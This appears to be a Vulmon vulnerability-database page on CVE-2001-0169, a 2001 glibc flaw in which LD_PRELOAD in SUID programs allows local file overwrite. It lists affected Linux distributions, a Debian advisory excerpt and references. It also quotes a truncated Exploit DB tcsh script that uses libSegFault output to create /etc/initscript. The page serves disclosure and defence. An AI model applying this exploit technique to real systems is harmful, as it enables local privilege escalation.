Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
2.1
CVSSv2

CVE-2001-0169

Published: 26/03/2001 Updated: 10/10/2017
CVSS v2 Base Score: 2.1 | Impact Score: 2.9 | Exploitability Score: 3.9
VMScore: 215
Vector: AV:L/AC:L/Au:N/C:N/I:P/A:N
Subscribe to Mandrakesoft

Vulnerability Summary

When using the LD_PRELOAD environmental variable in SUID or SGID applications, glibc does not verify that preloaded libraries in /etc/ld.so.cache are also SUID/SGID, which could allow a local user to overwrite arbitrary files by loading a library from /lib or /usr/lib.

Vulnerable Product Search on Vulmon Subscribe to Product

mandrakesoft mandrake linux corporate server 1.0.1

redhat linux 6.0

redhat linux 6.2

mandrakesoft mandrake linux 6.1

mandrakesoft mandrake linux 7.0

redhat linux 6.1

turbolinux turbolinux

mandrakesoft mandrake linux 7.1

mandrakesoft mandrake linux 7.2

mandrakesoft mandrake linux 6.0

trustix secure linux 1.1

trustix secure linux 1.2

turbolinux turbolinux 6.1

Vendor Advisories

Debian Security Advisories: DSA-039-1 glibc -- local file overwrite
The version of GNU libc that was distributed with Debian GNU/Linux 22 suffered from 2 security problems: It was possible to use LD_PRELOAD to load libraries that are listed in /etc/ldsocache, even for suid programs This could be used to create (and overwrite) files which a user should not be allowed to By using LD_PROFILE suid programs would ...

Exploits

Exploit DB: GLIBC 2.1.3 - 'LD_PRELOAD' Local Privilege Escalation
#!/bin/tcsh # przyklad wykorzystania dziury w LD_PRELOAD # shadow (tested on redhat 60, should work on others) if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje cd /lib umask 0 setenv LD_PRELOAD libSegFaultso setenv SEGFAULT_OUTPUT_NAME /etc/initscript echo czekaj to moze chwile potrwac while (! -e /etc/initscript ) ( userhe ...

References

NVD-CWE-Otherhttp://www.securityfocus.com/bid/2223http://www.securityfocus.com/archive/1/157650http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-012.php3?dis=7.2http://www.redhat.com/support/errata/RHSA-2001-002.htmlhttp://www.novell.com/linux/security/advisories/2001_001_glibc_txt.htmlhttp://www.calderasystems.com/support/security/advisories/CSSA-2001-007.0.txthttp://www.debian.org/security/2001/dsa-039http://archives.neohapsis.com/archives/linux/turbolinux/2001-q1/0004.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/5971https://nvd.nist.govhttps://www.debian.org/security/./dsa-039https://www.exploit-db.com/exploits/290/https://www.kb.cert.org/vuls/id/386504
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
blind SQL injectionSSRFbuffer overflowCVE-2023-28952CVE-2023-41822CVE-2024-27956CVE-2023-7028CVE-2024-34447CVE-2024-34460
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook